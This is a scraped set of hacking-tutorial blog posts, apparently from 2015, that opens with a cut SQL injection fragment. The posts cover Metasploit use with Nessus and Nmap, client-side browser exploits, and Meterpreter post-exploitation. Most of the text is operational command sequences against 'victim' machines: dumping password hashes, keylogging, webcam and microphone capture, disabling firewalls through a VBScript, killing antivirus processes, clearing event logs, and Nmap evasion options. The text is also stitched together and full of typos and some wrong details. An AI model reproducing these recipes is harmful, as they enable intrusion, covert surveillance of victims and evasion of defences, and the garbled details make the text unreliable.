WHERE category='bikes' AND '1'='2' /* always false -> returns no rows */
54 Chapter 2 • Testing for SQL Injection
The preceding statement should return no results, as the last condition in the WHERE
clause can never be met. However, keep in mind that things are not always as simple as shown
in these examples, and don’t be surprised if you inject an always false condition and the
application
returns results

IMP =>
Parameter manipulation

Mitigation =>
Output encoding
validation
sanitization

**********************
Learn more on => SQL injection Contd......
************************************************

Nessus and POST Exploitation in MetaSPLOIT

Friday, 15 May 2015

Nessus Basics 

Nessus is a properietary vulnerability scanner
It detects
> vulnerabilites
> misconfiguration
> default credentials on target system
> used in various compliance audits as well
===================
  Learn how to use Meterpreter in Metasploit => Meterpreter Basics

Metasploit Basics => Metasploit Basisc
======================================================

To open Nesses
    msfconsole -> type load nessus -> nessus_help

Connect to Nessus from our localhost for starting the scans
syntax
    nessus_connect <your username>:<your Password>@localhost:8834 <ok>
Example
    nessus_connect prasoonnigam:hacker09@localhost:8834 ok
8834 is the default port

Check the nessus scanning policies

Syntax
    nessus policy list

Four policies of Nessus
1) External network scan -> used for scanning network vulnerabilities externally
2) Internal network scan -> used for scanning network vulnerabilities internally
3) Web App Tests -> used for scaning web application for vulnerabilities
4) PCI-DSS (Payment Card Industry-data Security Standard) audits -> used in payment card industry as the data security standard

Scanning victim machine

> have to create a new scan
syntax
    nessus_scan_new <policy ID> <scan name> <target ip>
example
    nessus_scan_new -2 windowssan 192.168.3.2
> checking the status
    nessus_scan_status
> checking for the report list
    nessus report list
> opening the report
    nessus_report_hosts <report ID>
    example : nessus_report_hosts dgfwef82nd8934y89hg9rety389
>> when u see the severity, u r getting the total number of vulnerabilities

Classifications of the different vulnerabilities

> Sev 0 indicates high level vulnerabilities
> Sev 1 indicates medium level vulnerabilities
> Sev 2 indicates low-level vulnerabilities
> Sev 3 indicated informational vulnerabilities

Command to see all the vulnerabilities

    nessus_report_hosts_ports <target IP> <report id>
    example : nessus_report_hosts_ports 192.168.11.164 asjfh398fdbf5t705tdb4t9

Report Importing In Metasploit

> Importing Nmap report via msfconsole in PostgreSQL database
    save any host and save the nmap report in XML format

>> Check the database connectivity with the msfconsole
    syntax : db_status

> import the Nmap report
    syntax: db_import <report path name with name>
    example: db_import /root/Desktop/scan.xml

>> see the host details
    syntax: host <ip> <hostname on which nmap scan performed>
    Example: host 192.168.11.23
you will get to know OS and Mac Address

>> check the open port and services running on those ports
    syntax: services <hostname>
    example: services 192.168.0.102

> Importing the report of nessus in msfconsole
    syntax:    db_import <report path name with file location>
    example: db_import /root/Desktop/Nessus_scan.nessus

>check the vulnerabilities
    syntax: vulns <ip (hostname)>
    example: vulns 192.168.22.16


CLient Side Exploitation

 What are Client Side Attacks ???

> The Server is the main computer that shares its resources over the network and the client which are the other computer on the network use these resources..

> There is a large arrau of attacks that may be launched against the clients
such as
> browser-based attacks
> vulnerable service exploitation
> Client OS have multiple applications such as PDF Reader, Document Reader and instant messenger

> The malicious code may exploit any form of ActiveX JAVA and Flash.. in browser

Exploits of Victim browser

> browser autopwn
    msfconsole -> use auxiliary/server/browserautopwn -> show options -> set LHOST 192.168.2.23 (required field that to be filled) -> set SRVHOST 192.168.3.22 (SRVHOST means localhost address (set out local machine address)) -> set SRVPORT 80 (SRVPORT means the local port address) -> run

after type in the run it starts the exploit modules on the localhost and also it provides the malicious URL which must be given and must be clicked

    -> TO check the meterpreter session that was created type in "sessions"

(getting into the computer and creating session)
-> session (shows the ID) -> session -i 1 <id> -> sysinfo

> Internet Explorer Shortcut Icon Exploit
    shortcut icons that contain a malicious DLL

    msfconsole -> use windows/browser/ms10_046_shortcut_icon_dllloader -> show options -> set SRVHOST 192.168.2.3 -> set SRVPORT 80 -> set URIPATH / -> exploit -> sessions -> sessions -i 1

> Internet Explorer malicious VB script code execution exploit

    msfconsole -> use exploit/windows/browser/ms10_022_ie_vbsscript_winhlp32 -> show options -> set SRVHOST 192.168.11.105 -> set SRVPORT 80 -> set URIPATH / -> exploit -> send the URL
after F1 is pressed the malicios VB script will run in the browser and send a payload names calc.exe -> sessions -> sessions -i 1


                      POST Exploitation


    Post Exploitattion basically means the phases of operation once a victim's system has been compromised by the attacker.The value of the compromised system is determined by the value of the actual data stored in it and how an attacker may make use of it for malicious purposes...
    The concept of post exploitation has risen from this fact only as to how you can use the victim's compromised system's information; documenting it, and haing an idea of the configuration channels...

Phase of post exploitation
> Understanding the victim
> Privilege escalation
> Cleaning tracks and staying undetected
> Collecting system information and data
> Setting up backdooring and rookits
> Pivoting to penetrate internal networks

Lets the first phase of post exploitation by gathering as much information

Type in :
    sysinfo (get system info)
    getpid (get process ID)
    ps (get process list)
    run checkvm (the victim's system is a virtual machine or not)
    idletime (to check whether the victim is active or not)
    run get_env (the victim's system evironment by another meterpreter script)
    ipconfig (check the victim's system IP address)
    route (to see the full network settings)
    run getcountermeasure (for mapping the security configuration of the victim's systmem)
    run getgui (enable the victim's Remote Desktop Protocol service)
    run getgui -e
    run gettelnet (enabling the telnet service)
    run gettelnet -e
    run get_local_subnets (see the local subnet of the victim's)
    run hostedit (allows an attacker to add host enteries in the windows host file)
    run hostedit -e 127.0.0.1 www.apple.com
    run enum_logged_on_users (how many users are currently logged in)
    run enum_logged_on_users -c
    run get _application_list (it will show us all the installed applications)
    run windows/gather/forensics/enum_drives (gathering physical drive)
    run windows/gather/enum_ms_product_keys (get OS system's product key)
    run windows/gather/credentials/windows_autologin (check autologin feature)
    run winenum (dump some juicy information such as hashes and tokens)
    cd /root/.msf4/logs/scripts/winenum/Exploit-0FE265D 2013027.2532 -> LS
    cat hashdump.txt
    run scraper
    .msf4/logs/scripts/scraper/192.168.0.104_201330 -> cat services.txt


Post Exploitation Privilege Escalation

> Post exploitation is divided into five phases

Understanding Privilege Escalation
    Privilege Escalation in simple terms is gaining elevated privileges to resources that are normally protected and whose access is denied to normal or unauthorized users....
Example:- Things we can do after privilege escalation are installing malicious software for unethical uses
> deleting user files
> denying resources to a particular user
> viewing private information

Divided into two major forms :-
> Vertical Privilege Escalation
> Horizontal Privilege Escalation

Vertical Privilege Escalation
    a lower privileged user or application may access function that are reserved only for authorized or administrative users. This features is also known as privilege elevation..

Horizontal Privilege Escalation
    This escalation usually happens on a horizontal scale with repect t user rights. A normal user accessing the resources reserved for another person's resources

Exploiting the vicitim's system
> we use a software name called mini-share (free file sharing software)

Commands
    open msfconsole -> use ecploit/windows/http/minisgare get overflow -> show options -> set RHOST 192.168.11.203 (victim ip) -> set RPORT 80 -> show targets -> set TARGET 3 (choose the options) -> exploit ->

(Meterpreter) getuid -> getsystem -h -> getsystem -t 0 -> ps


Privilege escalation by post exploitation
    Module uses the built-in getsystem command to escalate the current session to the SYSTEM account from an administrator user account.

(Meterpreter)     run post/windows/escalate/getsystem

        run post/windows/escalate/service_permissions
(Module exploits the existing administrative privileges to obtain a system session. If it Fails in the 1st instance, the module inpsects the existing service and looks for insecure file permissions that are vulnerable to an attack)

Different Exploit for compromising the target system
    msf> exploit/windows/browser/ms10 002 aurora -> show options -> set SRVHOST 192.168.0.109 (Victim IP) ->  exploit -> session -> session -i 1


Post Eploitation Cleaning Up Traces
    Cleaning Tracks and trace through log deletion and staying undetected by disablig the firewall and antivirus systems

Why Firewall is important ?
A firewall is basically software or hardware that blocks unauthorized entry to a system or a network. A firewall also keeps track of intrusions and security breaches. If the firewall is well-configured, each unauthorized entry is blocked and logged in the security logs. It controls the incoming and outgoing network traffic and analyzes the data packets.
It decides whether it should allow the packet through the firewall or not.

A firewall is classified into three different types:
> Packet Filter Firewall
> Stateful Firewall
> Application Firewall

Packet Filter Firewall
    These types of firewall are associated with the first three layers of the OSI Model with a little help from the transport layer as well, for the source and destination port numbers. When a packet travels towards the packet filter firewall, it is analyzed with the help of set rules to match against.

Stateful Firewall
    These are also called second-generation firewalls. These firewalls work on the states of a network connection.Throughout the state, it determines whether to allow the packet into the network or not.

Application Firewall
    These are known as third-generation firewalls. Application firewalls work on application and protocols like HTTP, SMTP and SSH.They also help in detecting if an unwanted protocol is trying to bypass the firewall on an allowed port.

commands
    run getcountermeasure
        operational mode         = Enable

        -> shell -> netsh firewall show opmode
see if the firewall is enable or not
        -> shell -> netsh firewall set opmode mode=disable

Disabling firewalls through VBScript

    Code
        Set objFirewall = CreateObject("HNetCfg.FwMgr")
        Set objPolicy = objFirewall.LocalPolicy.CurrentProfile
        objPolicy.FirewallEnabled = FALSE
save code .vbs extension

syntax        upload <source filepath> <destination filepath>
Example        upload root/Desktop/disable.vbs C:\

    Goto destination and execute it


Antivirus Killing and Log Deletion

killing the processes of an antivirus with the help of post exploitation Meterpreter script known as killav

Script of killav.rb
        opt/framework/msf3/scripts/killav.rb

in killav.rb the name of the antivirus must be present there then only antivirus must be stoppped..

(Meterpreter) run killav -> tasklist (to see the taskmanager process) or tasklist /svc or tasklist /svc |find/I "avg"

> TO see the property th processes that are running
        sc queryex avgwd -> sc config (process name) start= disabled (disable the process which cannot be killed)
Terminating a processes
    taskkill /F /IM "antivirus name*"


Clearing tracks to be SAFE

Clearing all the log
 (Meterpreter) clearev

NMAP in METASPLOIT

Saturday, 2 May 2015

             NMAP (Network Mapper)
                                                                  using nmap in metasploit

> Nmap is a powerful security scanner developed by Gordon Lyon


===============
Metasploit => How to use metaploit click on me :)

MeterPreter BASics => How to use Meterpreter click one me :)
=============================================


NMAP TUTORIALS => NMAP TUTORIALS CLick on me :)


How nmap works ??

> Whenever Nmap performs a scan, it delivers an ICMP echo request to the destination for checking whether the host is alive or dead. This process saves much time for Nmap when it scans multiple hosts at a time. Sometimes ICMP requests are blocked by firewalls, so as a secondary check namp tries to connect to default open ports such as 80 and 443, which are used by the web server or HTTP..

Working with NMAP in Metasploit

Nmap is used for
> hosts
> service
> open ports detection on a computer network

Nmap has many features
> stealth scan
> aggressive scan
> firewall evasion scan
> has the abiity to fringerprint operating system
>>>>> Nmap has its own Nmap Scripting Engine -> can be used with Lua programming language

Nmap scanning using Metasploit
Nmap with no commands will perform a basic scan on the target address

syntax
    nmap <target> <ip_address>
    nmap 192.168.11.29

Scan multiple targets
syntax
    nmap <target target>
    nmap 192.168.11.46 192.168.11.29

Scan a list of targets
    >> just need to separate all targets by a new line or space
        for example
            192.168.11.29
            192.168.11.86
            192.168.11.36 and so on

syntax
    nmap -iL <list.txt>
    nmap -iL /root/Desktop/list.txt

Nmp Options
> Nmap commands options
©Pprasoon Nigam
Feature                                                                           Options
> Don't ping                                                                        -PN
> Perform a Ping Only Scan                                               -sP
> TCP SYN Ping                                                                -PS
> TCP ACK Ping                                                                -PA
> UDP Ping                                                                         -PU
> SCTP INIT Ping                                                              -PY
> ICMP Timestamp Ping                                                    -PP
> ICMP Echo Ping                                                              -PE
> ICMP Address Mask Ping                                               -PM
> IP Protocol Ping                                                               -PO
> ARP Ping                                                                         -PR
> Traceroute                                                                        -traceroute
> Force Reverse DNS Resolution                                        -R
> Disable Reverse DNS Resolution                                     -n
> ALternative DNS Lookup                                                --system-dns
> Manually Specified DNS Server(S)                                  --dns--servers
> Create a Host List                                                              -sL

Examples
> nmap -sP 192.168.11.60  (Ping only scan)
> nmap -PA 192.168.11.46  (TCP ACK Ping)
> nmap -PE 192.168.11.44  (ICMP echo ping)
> nmap -R 66.147.244.90   (Force reverse DNS resolution)


NMAP advanced scanning options

Features                                                                           Options
> TCP SYN Scan                                                              -sS
> TCP Connect Scan                                                         -sT
> UDP scan                                                                       -sU
> TCP Null Scan                                                               -sN
> TCP Fin Scan                                                                -sF
> Xmas Scan                                                                     -sX
> TCP ACK Scan                                                              -sA
> Custom TCP Scan                                                         -scanflags
> IP Protocol Scan                                                            -sO
> Send Raw Ethernet Packets                                          --send-eth
> Send IP Packets                                                             --send-ip

FLAGS                Usage
> SYN                Synchronize
> ACK                Acknowledgement
> PSH                 Push
> URG               Urgent
> RST                Reset
> FIN                 Finished


Examples
> nmap -sS 192.168.11.46 (TCP SYN scan) attempts to identify ports by sending a SYN packet to the target & waititng for a response. A SYN packet is basically  sent to indicate that a new connection is to be established. This type is also know as the stealth scan.
> nmap -sN 192.168.2.33 (TCP null scan) sends packets without TCP flags enabled . This done by setting the header to zero for fooling a firewalled  system in getting a response them

Custom TCP Scan
> nmap -scanflags SYNURG 192.168.0.102

Port scanning options
Features                                                Options
> Perform a Fast Scan                                    -F
> Scan Specific Ports                                     -p(port)
> Scan Ports by Name                                    -P(name)
> Scan Ports by Protocol                                -p U:(UDP Ports), T:(TCP Ports)
> Scan All Ports                                              -p"*"
> Scan Top Ports                                             --top-porys
> Perform a Sequential Port Scan                   -r

Examples
> nmap -F 1962.168.11.46 (Fast scan)
> nmap -p http 192.168.3.8 (scan port by name)
> nmap -r 192.168.3.88 (Performing a Sequential port scan) (useful for evading firewall and Intrusion Prevention System

Nmap has some feature that help to byoass these protection mechanism as well

Feature                                                                   Options
> Fragments Packets                                             -f
> Specify a Specific MTU                                    --mtu
> Use a Decoy                                                      -D
> Idle Zombie Scan                                             -sI
> Manually Specify a Source Port                      --source-port
> Append Random Data                                      --data-length
> Randomize Target Scan Order                          --randomize-hosts
> Spoof MAC Address                                        -spoof-mac
> Send Bad Checksums                                        --basums

Examples
> nmap -f 192.168.12.88 (fragment packets) Nmap sends very small 8 byte packets.. useful for evading improperly configured firewall system

> nmap -sI 192.168.3.88 192.168.11.56 (Idle Zombie scan) very unique scanning technique in which Nmap uses zombie host for scanning the target, In here use 2 IP address

Spoof MAC Address
This technique is useful when a firewalled-system detects a scanning process via the system's MAC address and blacklistes those MAC Address
MAC addresses can be spoofed via three different arguments

Arguments                                     Function
0 (zero)                                        Generates Random MAC Address
Specific Mac Address                  Uses the specified MAC Address
Vendor Name                               Generate a MAC Address from the specifies Vendor
                                                     (such as Apple Dell HP etc)

syntax
nmap -sT -Pn --spoof-mac Apple 192.168.11.29

Save Nmap output results
Features                                                    Options
Save Output to a Text File                            --oN
Save Output to a XML File                          --oX
Grepable Output                                            -oG
Output All Supported File Type                     -oA
Periodically Display statistics                        --stats-every
133t Output                                                     -oS

syntax
nmap -oX <scan.xml> <target>

example
nmap -oN scan.txt 192.168.11.46

METERPRETER BASICS


                                               METERPRETER Basics

AFTER U GET A SESSION WITH THE HELP OF Metasploit HOW TO USE meterpreter HERE IS ARE THE basics

HERE's THE SECRET


Meterpreter is one of the spearheads in the metasploit framework..
It is used as a payload post exploitation of a vulnerable system.
It is used in memory DLL injection Stagers and is extended over the network at runtime.
In Memory DLL, Injection is a technique used for injection code within that address space of  currently running process by forcing it to a load a DLL (Dynamic-Link Libarary) file

The single payload is very effective with its multiple capabilities
> helps in acquiring password hashes of a victim machine
> runnng a kylogger and
> privilege escalation.

The stealth feature makes it undetectable to many antivirus and host based intrusion detection systems
Meterperter also has the capability to switch between different processes to which it gets attached through DLL injections and stays by clinging to running application on the compromised host rather than creating on the system

Classified commands

> Command type
> Command name
> Description

Commands
Process listing

> getuid -> It gets the system ID & the name of the computer
> kill -> It terminates a process
> ps -> It lists the running processes
> getpid -> It gets the current process identifier

Keylog Usage
> keyscan_start -> It starts the keylogging session
> keyscan_stop -> It stops the keylogging session
> Keyscan_dump -> It dumps the keystrokes captured from the victim machine

Session
> enumdesktops -> It lists all of the accessible desktops and workstations
> getdesktop -> It gets the current Meterpreter desktop
> setdesktop -> It changes the Meterpreter's current desktop

Sniffer Functions
> use sniffer -> It loads the sniffer functions
> sniffer_start -> It starts the sniffer for the interface
> sniffer_dump -> It dumps the network capture of the victim machine locally
> sniffer_stop -> It stops the sniffer for the interface

Webcam Commands
> webcam_list -> It lists all of the webcams of the system
> webcam_snap -> It capture snaphots of the victim machine
> record_mic -> It records the sound of the environment from the default microphone on the machine

> sysinfo -> to check the system information
> screenshot -> capture a screenshot of the victim machine
> ps -> will show the running processes

*> migrate <pid> :: example migrate 1512 (explorer.exe) -> getpid -> keysscan_start (and wait for few minutes to capture the keystrokes of the victim machine ) -> keyscan_dump -> keyscan_stop (to dump and stop the keystrokes command )

*> webcam_snap ( u get the snap from the webcame)

*> shell (to get the command shell of the victim) -> mkdir <directory name> (creating a directory) (shell is the cmd of the of the victim computer)


Vulnerability scanning and Information Gathering

:> Information Gathering Through Metasploit
Information gathering is a process of collecting information about a victim techniques.
Divided into two steps
> Footprinting
> Scanning

The Metasploit auxilliary modules have various scans from ARP to SYN
service-based scans
> HTTP
> SMB
> SQL
> SSH

Methods for Information Gathering


>> whois
         It is widely used for quering databases that store registered users of an Internet resource

type in msfconsole
   whois <domain name>
example whois hackingrtz.com

To get e-mail we use e-mail harvesting
>  E-mail harvesting is very useful tool to get the e-mail IDs associated with a particular domain

syntax
 use auxiliary/gather/ search email collector -> show options -> set domain <domain name> -> run
for example :- set domain hackingartz.com

Active Information Gathering

useful auxiliary scanner is the telnet version scanner

syntax
  use auxiliary/scanner/telnet version -> show options -> See the area is empty

syntax
   set RHOSTS <target ip address>
   for example :-  set RHOSTS 192.168.0.103 -> run

To find whether a Remote Desktop connection (RDP) is available by RDP scanner
TO know aboout the port number RDP port

Syntax : type in
     use auxiliary/scanner/rdp/ms12_020_check -> show options
getteing the port we set RHOST

syntax
    set PORTS (port no.) -> set PORTS 3389
    set RHOST (ip address) -> set RHOST 192.168.11.46
done with all the options type run